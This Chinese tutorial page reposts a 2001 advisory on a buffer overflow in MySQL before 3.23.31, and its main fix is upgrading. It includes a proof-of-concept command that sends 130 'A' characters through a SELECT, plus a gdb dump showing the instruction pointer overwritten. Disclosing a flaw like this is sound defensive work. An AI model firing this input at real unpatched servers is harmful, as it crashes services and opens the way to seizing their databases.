当前位置: 首页 > 图文教程 > 数据库 > MYSQL > MySQL3.23.31之前版本的安全漏洞

MYSQL
轻松掌握如何从命令行启动mysqld服务器
教你快速掌握怎样在Windows下升级MySQL
解析:安装 MySQL时如何选择安装软件包
解析:快速的掌握 MySQL支持的操作系统
MySQL环境下导入数据时是否需要禁用索引
配置高可用性的MySQL服务器负载均衡群集
使用ERWin进行基于MySQL数据库的物理设计
数据库应用经验:如何简单安装MySQL数据库
DBA应当了解的MySQL客户端程序启动选项
将MySQL 5.0下的数据导入到MySQL 3.23中
讲解MaxDB数据库和MySQL数据库的主要差别
实例讲解如何利用crontab定时备份MySQL
个人经验总结:完全卸载MySQL数据库5.0
如何在Unix系统环境下安装MySQL数据库
适宜做简单搜索的MySQL数据库全文索引
教你在MySQL 5.0以上版本中配置主从库
经验总结:修改MySQL默认密码的具体步骤
将后台数据从Berkeley的文件DB转到MySQL
详细介绍查询优化技术在现实系统中的运用
MySQL数据库中对前端和后台进行系统优化

MYSQL 中的 MySQL3.23.31之前版本的安全漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-30   浏览: 71 ::
收藏到网摘: n/a

  所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。



下面为最初发表于 MySQL 邮件列表的信件摘要。

==================================================


漏洞是由Jo?o Gouveia 于1月12日发现的:

步骤:


在第一个终端上启动 mysql:


spike:/var/mysql # /sbin/init.d/mysql start


在另外一个终端上输入:

jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’

Enter password:

(没有反应?按^C退出)


在第一台终端上会显示:


spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault

nohup

$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin

g "$@" >>$err_log 2>&1>

Number of processes running now: 0

mysqld restarted on Fri Jan 12 07:10:54 WET 2001

mysqld daemon ended


使用 gdb 显示结果如下:


(gdb) run

Starting program: /usr/sbin/mysqld

[New Thread 16897 (manager thread)]

[New Thread 16891 (initial thread)]

[New Thread 16898]

/usr/sbin/mysqld: ready for connections

[New Thread 16916]

[Switching to Thread 16916]


Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(gdb) info all-registers

eax 0x1 1

ecx 0x68 104

edx 0x8166947 135686471

ebx 0x41414141 1094795585

esp 0xbf5ff408 0xbf5ff408

ebp 0x41414141 0x41414141

esi 0x41414141 1094795585

edi 0x0 0

eip 0x41414141 0x41414141

eflags 0x10246 66118

cs 0x23 35

ss 0x2b 43

ds 0x2b 43

es 0x2b 43

fs 0x0 0

gs 0x0 0


其中的 eip 指示就是缓冲溢出了。


解决办法就是升级到 3.23.31。所以,各位如果还没有把数据库升级到最新版本,请赶快行动。